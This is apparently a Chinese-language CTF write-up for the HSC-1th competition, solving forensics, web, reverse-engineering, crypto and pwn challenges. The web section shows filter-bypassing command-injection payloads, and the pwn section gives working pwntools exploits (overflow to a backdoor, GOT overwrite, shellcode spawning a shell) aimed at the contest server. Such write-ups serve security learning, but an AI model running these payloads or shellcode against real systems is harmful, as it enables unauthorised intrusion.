HSC-1th writeup

目录

MISC

Sign-in

DORAEMON

汝闻,人言否

wireshark

PCXP

WEB

CLICK

Web-sign in

EXEC

REVERSE

hiahia o(*^▽^*)┛

ANDROID

WAY

SPARK

CRYPTO

Easy SignIn

AFFINE

Baby RSA

PWN

Ez pwn

EZPWN

SHALL


MISC

Sign-in

关注公众号,发送HSC2019

DORAEMON

1、zip根据注释

哆啦A梦把泡好的QR放进口袋后,用六位数字把自己放好了。你能找到它吗?

使用6位数字爆破得到密码:376852

2、解压zip得到图片,修改高度得到残缺的二维码

3、修改两个角扫码得到flag。

汝闻,人言否

1、010分析发现结尾有多余数据,多余数据开头为4b 50 03 04 怀疑是zip文件。

2、分离处多余数据,头尾 4b 50 改为 50 4b 保存为zip得到一个加密的zip文件。

3、zip注释信息为:qazsedcftrfvgycft6yhntgbnytfvbhyik,.;p  像是键盘码:

qazsedcft rfvgy cft6yhn tgbn ytfvbhy ik,.;p    

得到密码:WVALOU

4、解压缩得flag文件,查看文件头为wav,Audacity查看频谱图,得到flag:

HSC-1th writeup_第1张图片

flag{e5353bb7b57578bd4da1c898a8e2d767}

wireshark

1、wireshark.zip分理处wireshark.png

2、lsb隐写wireshark.png得到一张图片,打开时二维码,扫码得到:wrsak..iehr370

3、对wrsak..iehr370使用栅栏解码:wireshark3.7.0

4、使用密码wireshark3.7.0解压wireshark.zip得到 wireshark

5、打开发现类似于pdf但是头部有问题,修复文件头打开发现是wireshark手册

6、010查看pdf二进制发现很多09 20组成得whitespace摘出来,20替换为30 09替换为31

8、

HSC-1th writeup_第2张图片

exp转换:

from Crypto.Util.number import long_to_bytes
c=[
"1110100",
"1111000",
"1110100",
"1100110",
"1101100",
"1100001",
"1100111",
"1111011",
"1000111",
"1101111",
"110000",
"1100100",
"1001010",
"110000",
"1000010",
"1011111",
"1111001",
"110000",
"1110101",
"1100110",
"1001001",
"1101110",
"1100100",
"1001100",
"1110100",
"1111101"]
flag=''
for i in c:
    flag+=chr(int(i,2))
print(flag)
#txtflag{Go0dJ0B_y0ufIndLt}

PCXP

1、vol -f ./PCXP2.raw --profile=WinXPSP2x86 filescan | grep -E 'png|jpg|gif|zip|rar|7z|pdf|txt|doc'

HSC-1th writeup_第3张图片

2、vol -fPCXP2.raw --profile=WinXPSP2x86 dumpfiles -Q 0x000000000227db70 -D ./

得到ffflaaagggg.rar 另一个ffflaaagggg.zip也导出来了 发现没用。

3、vol -f PCXP1.raw --profile=WinXPSP2x86 filescan | grep -E 'png|jpg|gif|zip|rar|7z|pdf|txt|doc|flag'

4、vol -f PCXP1.raw --profile=WinXPSP2x86 dumpfiles -Q 0x00000000021221e0 -D ./

得到mirror.rar

HSC-1th writeup_第4张图片

5、解压得到mirror.png:

010打开发现后半部分有多余数据反序了

HSC-1th writeup_第5张图片

分离出来逆序

得到key:

HSC-1th202248H

6、解压ffflaaagggg.rar得到secret.pcap

foremost解压出两张png 使用水印隐写得到:

flag:flag{Wat3rMarkPtysc}

WEB

CLICK

点击28800次

1、控制台:var2=28800

2、点一下即可出flag

Web-sign in

1、根据提示访问/robots.txt

User-agent: *

Disallow:

Disallow: fiag_ls_h3re.php

2、访问fiag_ls_h3re.php,显示不在这 但是右键和F12被禁用。

3、使用插件禁用js ,查看源码得到flag

EXEC

 

 

1、需要绕过过滤进行命令执行。

针对命令可使用双写绕过。

针对空格可使用$IFS绕过。

命令执行后没有回显,可使用>写入文件,访问文件得到命令执行结果。

2、执行命令:

cmd=llss$IFS/>1

HSC-1th writeup_第6张图片

cmd=cacatt$IFS/ctf_is_fun_flflagag2021>1

REVERSE

hiahia o(*^▽^*)┛

ida分析逻辑:

 qmemcpy(v4, "igdb~Mumu@p&>%;%<$

 

前面是对v4处理,处理完成后与输入的flag做对比,所以,patch一下代码使得对比失败后不退出,然后再返回处下断点,查看下V4的内容即可。

qmemcpy(v4, "igdb~Mumu@p&>%;%<$

 

ANDROID

HSC-1th writeup_第7张图片

对应逆向即可。

iArr = [102, 13, 99, 28, 127, 55, 99, 19, 109, 1, 121, 58, 83, 30, 79, 0, 64, 42]
iArr2 = [42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42]
#iArr2==iArr
#exp:
#flag{xxxx}
for i in range(17):
    if  i % 2 == 0:
        iArr[i] = iArr[i] ^ i 
for i in range(17):
    if  i % 2 != 0:
        iArr[i] = iArr[i] ^ iArr[i + 1];
        pass
print(bytes(iArr))

 

WAY

1、脱upx壳:

upx -d    maze-upx.exe

2、ida分析得到迷宫:OIIIIOOIO#IOOOIIOIOIIIIII

OIIII
OOIO#
IOOOI
IOIOI
IIIII

3、手动得到路径sdsddwd

4、计算md5

exp:

m='OIIIIOOIO#IOOOIIOIOIIIIII'

for i in range(0,len(m),5):
	print(m[i:i+5])

'''
OIIII
OOIO#
IOOOI
IOIOI
IIIII
'''
#sdsddwd
import hashlib
print(hashlib.md5(b"sdsddwd").hexdigest())
#flag{6654b3343f6f3f6223a721e7f65e87f8}

 

SPARK

ida分析不了,使用ghidra得到伪代码:

HSC-1th writeup_第8张图片

算法简单逆向即可:

exp

a = '37463f3044413243';
b = '3429000000000000';

enc=bytes.fromhex('37463f30444132433429')
flag=''
for i in range(10):
    flag+=chr((enc[i]+0x2f)&0xff)
print(flag)

 

CRYPTO

Easy SignIn

题目:

5445705857464579517A4A48546A4A455231645457464243566B5579556C7053546C4A4E524564565646644D515670455130354C5755644F5231685256314A5452315A5552304E57576C5A49525430395054303950513D3D

exp:

a='5445705857464579517A4A48546A4A455231645457464243566B5579556C7053546C4A4E524564565646644D515670455130354C5755644F5231685256314A5452315A5552304E57576C5A49525430395054303950513D3D'
flag=bytes.fromhex(a)
import base64
flag=base64.b64decode(flag)
flag=base64.b32decode(flag)
flag=base64.b64decode(flag)
print(flag)

AFFINE

仿射密码,先根据存在'flag'爆破a、b 然后求解。

exp:

# -*- coding: utf-8 -*-
import string
import hashlib,gmpy2

letter=string.ascii_letters+string.digits
def affine_encode(m,a,b,origin="abcdefghijklmnopqrstuvwxyz"):
    r = ""
    for i in m:
        if origin.find(i) != -1:
            r += origin[(a*origin.index(i)+b) % len(origin)]
        else:
            r += i
    return r
def affine_decode(c,a,b,origin="abcdefghijklmnopqrstuvwxyz"):
    r = ""
    n = len(origin)
    try:
        ai = gmpy2.invert(a,n) % n
        for i in c:
            if origin.find(i) != 1:
                r += origin[(ai*(origin.index(i)-b)) % n]
            else:
                r += i
        return r
    except:
        return ""

c="xGJ13kkRK9QDfORQomFOf9NZs9LKVZvGqVIsVO9NOkorv"
for a in range(100):
    for b in range(100):
        ff=affine_decode(c,a,b,letter)
        if 'flag' in ff:
            print(a,b,ff)
import hashlib
result='Oh62Affine1sSti1lN0tSecureEnoughToProtectflag'
flag = hashlib.md5(result.encode()).hexdigest()
print("flag{"+flag+"}")

#11 17 Oh62Affine1sSti1lN0tSecureEnoughToProtectflag
#11 79 Oh62Affine1sSti1lN0tSecureEnoughToProtectflag
#73 17 Oh62Affine1sSti1lN0tSecureEnoughToProtectflag
#73 79 Oh62Affine1sSti1lN0tSecureEnoughToProtectflag
#flag{2b9b99caae1cc49e5b5aacbc8cc22350}

 

Baby RSA

1、计算P高位

from Crypto.Util.number import *
import gmpy2


def lfsr(status,mask):
    out = (status << 1) & 0xffffffff
    i=(status&mask)&0xffffffff
    lastbit=0
    while i!=0:
        lastbit^=(i&1)
        i=i>>1
    out^=lastbit 
    return (out,lastbit)

status= 1
mask = 0b10110001110010011100100010110101

p=''
key='0101110100100111011011011000111010000111101000101010100100100011010111011000010010100101110110011101110110010100010111001110010011101010111011001100011011010110001010011111111110100110101010101110100110011010110101110110000110010101010000010110100110110110001110101011000011110100011011100101101101001000110010100111000111001111010101011011111110010111100101111001010000100010100001000111010011011111010011101100011101011010011010110001101110110110000110010011001101100000110000110100101010010010110101100101111101110000010011101110010101110100011101100110111111001010'
#key='0001001001110010101000100011011111010000000011000111111010101110010101111011110001101011001110101010001011000011101101000110011001011110111001111110110110011001011100000010110000000100100000101100100111011000000011101101110010001100011110001100010001101010101011101000100100100010011111111110001111100001011110110011010000011000101110110001010110000111111010011010111011101000101101101110011101000110010001011111001111000010001011010101001110100001111010000010010111111100000001011010100100111000111101101100110101000010111100010100000111110100000111001111101001000000'
for i in range(568):
    curnum = int(key[i])
    (status,out)=lfsr(status,mask)
    p+=str(curnum ^ out)
print(p)
#p=p+'0'*(1024-568)
p=int(p,2)
print("p=",hex(p))

 

得到p= 0x807c1395b8128e6de865ab20dd2a39684f6831464553c65215cfe2861192657b6938d227c75e902ae858fdbd8b118c8522c08a3bf978bb203bc1644fe526f2de55b065b0507958

因为已知p高位只有568位 需要有576位才可以推导出p,所以需要爆破8位。

sage脚本:

from sage.all import *
import binascii
n =   9363543374665338283861145656340115756598328744870620756798779080826725774691364161648335378062705433999048117564356637094421930886166369832353405527855104576202658647651524758179962855692461154859961903531990172279764099199157181167775307950690492969859829926808950964120678082460448847927074487568619536568740301649988555476490206693181162301088156855926656544441682939839165455244630182978802660669255401576213941067679888164237586879364615664942234247896214195262510935345922512831632385741735810122730130366521612834556565838623708828780093323310348242654778247293430853566054703991781432542625271396246500576703
 
 
cipher = 3641304537029815746727163894554557322382012539953948183406308231174259571263608621970973671202001456955622458371303424750815017578104069924877881162707673935496925529412748663209884628320657034190702348924814794263041483260377960569530869386619921425415323912964305979776909598200202236912823968867485696101691879580799000240715778010424877093758489309380968229017074542588151574195295436881889313935734282141447498134543053106463951864974512375314091440713165047188590693431938599822340588934591712592995622334522799914563528630705687647950894928965913199772209825508001274120556508220248069647851360567609656517789
 
e2 = 65537
pbits = 1024
for i in range(0,127):
    p4=0x807c1395b8128e6de865ab20dd2a39684f6831464553c65215cfe2861192657b6938d227c75e902ae858fdbd8b118c8522c08a3bf978bb203bc1644fe526f2de55b065b050795800
    p4=p4+int(hex(i),16)
    print(hex(p4))
    kbits = pbits - p4.nbits()  #未知需要爆破的比特位数
    print(p4.nbits())
    p4 = p4 << kbits
    PR. = PolynomialRing(Zmod(n))
    f = x + p4
    roots = f.small_roots(X=2^kbits, beta=0.4) #进行爆破
    #rint roots
    if roots:        #爆破成功,求根
        p = p4+int(roots[0])
        print("p: ", hex(int(p)))
        assert n % p == 0
        q = n/int(p)
        print("q: ", hex(int(q)))
        print(gcd(p,q))
        phin = (p-1)*(q-1)
        print(gcd(e2,phin))
        d = inverse_mod(e2,phin)
        flag = pow(cipher,d,n)
        flag = hex(flag)[2:]
        print(bytes.fromhex(flag))

 

PWN

Ez pwn

#encoding=utf-8
from pwn import *
fpath='/mnt/d/ctf/ti/hscctf2022/pwn-Ez_pwn/pwn'
#r = process(fpath)
r = remote("hsc2019.site",10144)
backdoor=0x400741
payload=b"a"*64+p64(0)+p64(0x400740)+p64(backdoor)
r.sendline(payload)
r.interactive()

 

EZPWN

#encoding=utf-8
from pwn import *
fpath='/mnt/d/ctf/ti/hscctf2022/pwn-EZPWN/pwn'
#r = process(fpath)
r = remote("hsc2019.site",10456 )

elf=ELF(fpath)
backdoor=0x400796

r.sendlineafter("your ID?",'aa')
r.sendlineafter("Give me the target address?",str(elf.got['printf']))
r.sendlineafter("Give me the data: ",p64(backdoor))

r.interactive()

 

SHALL

在0x0x600000处内存,寻找地址存储地址大于本身0x50以上的。发现在0x600088处:

0x600088 —▸ 0x60010c (hello)

于是将start的ebp调整到0x600088对应main内写入数据的地址为:0x600088+0x50 = 0x6000D8,能够覆盖start返回地址0x60010c,在0x60010c写入shellcode

#encoding=utf-8
from pwn import *
from pwn import *
context(os='linux',arch='amd64')
fpath='/mnt/d/ctf/ti/hscctf2022/pwn-SAHELL/pwn'
#r = process(fpath)
r = remote("hsc2019.site",10655 )
code = shellcraft.sh()
shellcode = asm(code)
#gdb.attach(r,'b *0x4000cb')

payload=b'\0'*0x1a0+p64(0x600088)+p64(0x4000FB)+p64(0)+p64(0x60010C)
r.sendline(payload)
payload=b"\x90"*0x34+b"\x90"*0+shellcode
#pause()
r.sendline(payload)
r.interactive()

你可能感兴趣的:(ctf,ctf,信息安全,HSC-1th,HSCCTF,hscctf2022)